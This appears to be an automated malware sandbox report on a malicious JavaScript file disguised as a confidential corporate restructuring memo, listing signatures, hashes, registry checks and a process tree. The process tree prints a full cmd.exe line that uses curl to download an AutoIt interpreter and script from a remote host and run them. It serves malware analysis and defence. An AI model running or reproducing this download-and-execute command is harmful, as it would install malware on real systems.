Overview
overview
10Static
static
1Embarking_...ial.js
windows7-x64
3Embarking_...ial.js
windows10-2004-x64
10Navigating...ial.js
windows7-x64
3Navigating...ial.js
windows10-2004-x64
10Redefining...ial.js
windows7-x64
3Redefining...ial.js
windows10-2004-x64
10Role_Direc...ial.js
windows7-x64
3Role_Direc...ial.js
windows10-2004-x64
10Transition...ial.js
windows7-x64
3Transition...ial.js
windows10-2004-x64
10Analysis
-
max time kernel
149s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
18-10-2023 07:18
Static task
static1
Behavioral task
behavioral1
Sample
Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Embarking_on_Our_Renewed_Mission_and_Values_2023_Confidential.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
Navigating_Our_Evolution_October_2023_Confidential.js
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
Navigating_Our_Evolution_October_2023_Confidential.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
Redefining_Our_Structural_Canvas_2023_Confidential.js
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
Redefining_Our_Structural_Canvas_2023_Confidential.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
Role_Directives_Effective_2023_Confidential.js
Resource
win7-20230831-en
Behavioral task
behavioral8
Sample
Role_Directives_Effective_2023_Confidential.js
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
Transition_Journey_2023_Confidential.js
Resource
win7-20230831-en
Behavioral task
behavioral10
Sample
Transition_Journey_2023_Confidential.js
Resource
win10v2004-20230915-en
General
-
Target
Navigating_Our_Evolution_October_2023_Confidential.js
-
Size
50KB
-
MD5
e65b29d3b1c48e5ca3d77588e6375382
-
SHA1
ef407527c8228d8a1b7bc1ec5c1c4000464498ad
-
SHA256
1706dccb08d8fa1a4e38ae118a4137c0ab4bb6b906eef24693a422a30b465e2d
-
SHA512
d2fb401af2cf8a4d5c152dfceead38b0693103e100dafa060f6bde0a3241aa3061892bede91bb71255cd608c4200f93131e2fbdb58895620a3bf1591ddfb87e2
-
SSDEEP
768:pBA7PMMFA0tdlXKNSR4vlGRep2lcwJeL+C2jQdc7YCORUQuFBt3Cj0yFUK:nAIMFFdYMxAcEQDg
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4472 created 2676 4472 Autoit3.exe 36 PID 2516 created 3720 2516 MicrosoftEdgeUpdate.exe 40 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agefdda.lnk MicrosoftEdgeUpdate.exe -
Executes dropped EXE 1 IoCs
pid Process 4472 Autoit3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Autoit3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Autoit3.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MicrosoftEdgeUpdate.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4472 Autoit3.exe 4472 Autoit3.exe 4472 Autoit3.exe 4472 Autoit3.exe 2516 MicrosoftEdgeUpdate.exe 2516 MicrosoftEdgeUpdate.exe 2516 MicrosoftEdgeUpdate.exe 2516 MicrosoftEdgeUpdate.exe 3504 MicrosoftEdgeUpdate.exe 3504 MicrosoftEdgeUpdate.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2516 MicrosoftEdgeUpdate.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 3044 wrote to memory of 3356 3044 wscript.exe 82 PID 3044 wrote to memory of 3356 3044 wscript.exe 82 PID 3356 wrote to memory of 3628 3356 cmd.exe 84 PID 3356 wrote to memory of 3628 3356 cmd.exe 84 PID 3356 wrote to memory of 1536 3356 cmd.exe 85 PID 3356 wrote to memory of 1536 3356 cmd.exe 85 PID 3356 wrote to memory of 4472 3356 cmd.exe 86 PID 3356 wrote to memory of 4472 3356 cmd.exe 86 PID 3356 wrote to memory of 4472 3356 cmd.exe 86 PID 4472 wrote to memory of 2516 4472 Autoit3.exe 87 PID 4472 wrote to memory of 2516 4472 Autoit3.exe 87 PID 4472 wrote to memory of 2516 4472 Autoit3.exe 87 PID 4472 wrote to memory of 2516 4472 Autoit3.exe 87 PID 2516 wrote to memory of 3504 2516 MicrosoftEdgeUpdate.exe 93 PID 2516 wrote to memory of 3504 2516 MicrosoftEdgeUpdate.exe 93 PID 2516 wrote to memory of 3504 2516 MicrosoftEdgeUpdate.exe 93 PID 2516 wrote to memory of 3504 2516 MicrosoftEdgeUpdate.exe 93
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2676
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2516
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3720
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"2⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3504
-
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Navigating_Our_Evolution_October_2023_Confidential.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & curl -o Autoit3.exe http://hgfdytrywq.com:80 & curl -o pfdyfu.au3 http://hgfdytrywq.com:80/msidvdogqzm & Autoit3.exe pfdyfu.au32⤵
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\system32\curl.execurl -o Autoit3.exe http://hgfdytrywq.com:803⤵PID:3628
-
-
C:\Windows\system32\curl.execurl -o pfdyfu.au3 http://hgfdytrywq.com:80/msidvdogqzm3⤵PID:1536
-
-
C:\Users\Admin\AppData\Local\Temp\Autoit3.exeAutoit3.exe pfdyfu.au33⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4472
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
166B
MD5b840e69cfa7a6ee1ec46ab82fd0bf19d
SHA129a858c1e0ec934386a3853b7e2bf7cf715dbc2d
SHA256af90de19c4a04247a80e88689f7d5582e2c08cd27ec6ab8e288407c7b8555f96
SHA5128113e382050d923dfb2c24163adbcc310d975d9142fe7b42a69a4c5629c5d16962b13b4af65405caf1ed5a639d4fca0d9b2256889ce4cb31cc03eeb7517130e1
-
Filesize
166B
MD5b840e69cfa7a6ee1ec46ab82fd0bf19d
SHA129a858c1e0ec934386a3853b7e2bf7cf715dbc2d
SHA256af90de19c4a04247a80e88689f7d5582e2c08cd27ec6ab8e288407c7b8555f96
SHA5128113e382050d923dfb2c24163adbcc310d975d9142fe7b42a69a4c5629c5d16962b13b4af65405caf1ed5a639d4fca0d9b2256889ce4cb31cc03eeb7517130e1
-
Filesize
485KB
MD5d53f05550211535178a23ba86edd7388
SHA168d2d61732e8c2b2ad875d1e2ad9f39f190914b4
SHA256bd7a4b0aa4d06dba3f8aa33277f016d018313ee09eee2696a565f60469ea589d
SHA512b00445bb380ed158907302ecc0b18e10194074f4c3dac83b139fbba47c243d60ea46e55d711c09200301e3cb447abe93ffe5997b3611fb811fb323f07949889d
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
485KB
MD5d53f05550211535178a23ba86edd7388
SHA168d2d61732e8c2b2ad875d1e2ad9f39f190914b4
SHA256bd7a4b0aa4d06dba3f8aa33277f016d018313ee09eee2696a565f60469ea589d
SHA512b00445bb380ed158907302ecc0b18e10194074f4c3dac83b139fbba47c243d60ea46e55d711c09200301e3cb447abe93ffe5997b3611fb811fb323f07949889d
-
Filesize
4B
MD51788f11aeb121e509f01b4817c859109
SHA19c961d98a96b584e446245f6b659b36304a770d9
SHA256d8d8a5e7d23fa487cd8307da639ed731fcceb82569bb53cf1e04ce372a25161a
SHA512d75f9f6bc29ff229c3213d4658e517c597a0e9c7fd3b792fde5087a9641290f0ff68f9c7faa92596f8541bf990f4114f72fa7f54e2046315ea1f7231c099dc1e
-
Filesize
485KB
MD5d53f05550211535178a23ba86edd7388
SHA168d2d61732e8c2b2ad875d1e2ad9f39f190914b4
SHA256bd7a4b0aa4d06dba3f8aa33277f016d018313ee09eee2696a565f60469ea589d
SHA512b00445bb380ed158907302ecc0b18e10194074f4c3dac83b139fbba47c243d60ea46e55d711c09200301e3cb447abe93ffe5997b3611fb811fb323f07949889d